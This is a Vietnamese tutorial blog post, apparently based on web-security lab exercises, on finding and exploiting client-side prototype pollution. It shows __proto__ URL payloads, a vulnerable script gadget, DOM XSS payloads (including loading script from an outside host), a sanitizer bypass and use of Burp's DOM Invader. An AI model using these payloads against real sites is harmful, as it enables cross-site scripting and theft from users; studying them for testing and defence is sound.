+3

Prototype Pollution attack (phần 2)

III. Phân tích và khai thác các kỹ thuật phát hiện, tấn công Client-side - Prototype Pollution

Client-side prototype pollution xảy ra khi ứng dụng web cho phép người dùng kiểm soát các thuộc tính hoặc giá trị của prototype phía client. Kẻ tấn công có thể lợi dụng lỗ hổng này nhằm thay đổi các thuộc tính quan trọng trong prototype, gây ảnh hưởng đến hành vi của ứng dụng và có thể dẫn đến các cuộc tấn công khác như XSS (Cross-Site Scripting) hoặc CSRF (Cross-Site Request Forgery).

1. Sử dụng Console tool

Thông thường, các điểm đầu vào (input) trong một ứng dụng web sẽ là điểm bắt đầu tấn công của các hacker. Nếu kiểm tra bằng cách thử tại tất cả điểm input của ứng dụng sẽ cần rất nhiều trường hợp và tốn lượng thời gian lớn. Có thể sử dụng một phương pháp kiểm tra đơn giản hơn như sau:

Bước 11: Thêm các phần tử prototype dưới dạng tham số trong URL. Ví dụ:

vulnerable-website.com/?__proto__[foo]=bar
vulnerable-website.com/?__proto__.foo=bar
vulnerable-website.com/?constructor[prototype][foo]=bar
vulnerable-website.com/?constructor.prototype.foo=bar

Bước 22: Sử dụng Console Tool trong bộ công cụ Dev Tools, kiểm tra giá trị Object.prototype.foo. Nếu giá trị trả về là bar cũng đồng nghĩa với việc trang web chứa lỗ hổng, nếu trả về undefined tức tấn công chưa thành công.

image.png

Lặp lại 22 bước trên tại các đường dẫn khác nhau của trang web.

Khi phát hiện ứng dụng chứa lỗ hổng, một trong những hướng tấn công phổ biến là thực hiện chèn payload để khai thác lỗ hổng XSS, thông thường bằng cách phân tích và tìm kiếm các tham số thuộc tính có thể được tận dụng trong các tệp .js của ứng dụng. Trong đó, chú ý các đoạn chương trình sử dụng các hàm, chức năng tiềm ẩn nguy cơ bị tấn công XSS như innerHTML hoặc eval().

Phân tích bài lab DOM XSS via client-side prototype pollution sử dụng console tool phát hiện và khai thác lỗ hổng.

Kiểm tra với console tool nhận thấy trang web có thể bị khai thác bằng lỗ hổng prototype pollution:

image.png

Hiện tại chúng ta có thể thay đổi giá trị thuộc tính bất kỳ của tất cả đối tượng trang web sử dụng. Điều cần quan tâm lúc nào là đối tượng nào chứa thuộc tính có thể bị lợi dụng.

Kiểm tra mã nguồn, phát hiện 22 file javascript deparam.jssearchLogger.js

image.png

Trong đó, file searchLogger.js

async function logQuery(url, params) {
  try {
    await fetch(url, {method: "post", keepalive: true, body: JSON.stringify(params)});
  } catch(e) {
    console.error("Failed storing query");
  }
}

async function searchLogger() {
  let config = {params: deparam(new URL(location).searchParams.toString())};

  if(config.transport_url) {
    let script = document.createElement('script');
    script.src = config.transport_url;
    document.body.appendChild(script);
  }

  if(config.params && config.params.search) {
    await logQuery('/logger', config.params);
  }
}

window.addEventListener("load", searchLogger);

Chú ý tới đoạn code sau trong hàm searchLogger():

if(config.transport_url) {
  let script = document.createElement('script');
  script.src = config.transport_url;
  document.body.appendChild(script);
}

Đoạn mã có thể hiểu: Khi thuộc tính transport_url của đối tượng config khác null, tạo một thẻ <script> mới có thuộc tính src là giá trị config.transport_url.

Với lỗ hổng prototype pollution, chúng ta hoàn toàn có thể thay đổi giá trị của config.transport_url trong trường hợp này. Thật vậy, tại tùy chọn Sources > searchLogger.js > đặt break point tại dòng 1212 thực hiện debug > tải lại trang web với tham số __proto__[transport_url]=viblo > kiểm tra giá trị config.transport_url tại phần Watch:

image.png

Đồng thời, kiểm tra tại tùy chọn Elements cũng xuất hiện thẻ <script> mới có thuộc tính src=viblo

image.png

Do đó, chúng ta có thể lợi dụng giá trị config.transport_url thực hiện cuộc tấn công XSS (Trong trường hợp này là DOM XSS) bằng cách chèn payload vào thuộc tính src trong thẻ <script>.

Cách 11: Tải payload javascript từ một trang web khác. (Lưu ý rằng phương pháp này có thể không hiểu quả với các trang web quy định nghiêm ngặt chính sách CSP)

Payload ví dụ: https://bo0om.ru/csp.js

image.png

image.png

Cách 22: Chèn mã độc javascript vào trang web bằng data:

Payload ví dụ: data:,alert('viblo')

image.png

Bạn đọc có thể luyện tập thêm với bài lab DOM XSS via an alternative prototype pollution vector.

2. Bypass filter

Đôi khi, chúng ta gặp phải một số cơ chế phòng ngừa tấn công prototype pollution. Kiểm tra và phân tích các file .js có thể giúp chúng ta tìm ra cách thức vượt qua lớp cơ chế bảo vệ này. Ví dụ:

function sanitizeKey(key) {
  let badProperties = ['constructor','__proto__','prototype'];
  for(let badProperty of badProperties) {
    key = key.replaceAll(badProperty, '');
  }
  return key;
}

Chương trình trên kiểm tra các từ khóa constructor, __proto__, prototype trong URL, nếu tồn tại sẽ thực hiện loại bỏ các từ khóa này bằng hàm replaceAll(). Tuy nhiên, do hàm replaceAll() chỉ loại bỏ duy nhất 11 lần từ khóa được yêu cầu. Nên có thể dễ dàng bypass bằng cách "double" từ khóa, ví dụ:

__pro__proto__to__[foo]=bar

image.png

Tham khảo bài lab Client-side prototype pollution via flawed sanitization.

3. Khai thác lỗ hổng với DOM Invader

Đôi khi, một số trang web chứa số lượng tệp .js lớn và mỗi tệp có thể lên đến hàng nghìn, thậm chí chục nghìn dòng code khiến cho việc tìm kiếm các thuộc tính đối tượng gặp nhiều khó khăn, đôi khi tiêu tốn lượng thời gian lớn nhưng không thu lại được kết quả mong đợi. Và đây là lúc chúng ta cần tìm kiếm đến các công cụ giúp tự động hóa việc tìm kiếm / khai thác lỗ hổng. Phần mềm Burp Suite cung cấp một công cụ hữu ích là DOM Invader. Công cụ cho phép tự động tìm kiếm, rà soát các file .js:

image.png

Để sử dụng công cụ với mục đích tìm kiếm / khai thác lỗ hổng Prototype Pollution, chúng ta sẽ sử dụng Burp Browser và bật DOM Invader tại extension > Bật Attack types

image.png

Lúc này, khi truy cập trang web, công cụ sẽ tự động kiểm tra, chúng ta có thể xem kết quả tại mục DOM Invader trong Dev Tools:

image.png

Ngoài ra có thể lựa chọn chế độ scan trong Extension DOM Invader > Attack types > Setting

image.png

DOM Invader có thể giúp chúng ta tiết kiệm nhiều thời gian trong quá trình kiểm thử dạng lỗ hổng Prototype Pollution, đặc biệt đối với các ứng dụng có sử dụng các thư viện thuộc bên thứ ba - thường có số lượng mã nguồn cực lớn. Cùng luyện tập với bài lab Client-side prototype pollution in third-party libraries bằng sự hỗ trợ của DOM Invader.

Thiết lập các tùy chọn trong extension DOM Invader, tải lại trang web, kiểm tra tại Dev Tools > DOM Invader có kết quả:

image.png

Công cụ phát hiện yếu tố đáng nghi hash, chọn Scan for gadgets > Exploit

image.png

Công cụ tự động kiểm thử bằng các payload sẵn có, thu được kết quả:

image.png

Các tài liệu tham khảo


©️ Tác giả: Lê Ngọc Hoa từ Viblo


All Rights Reserved

Viblo
Let's register a Viblo Account to get more interesting posts.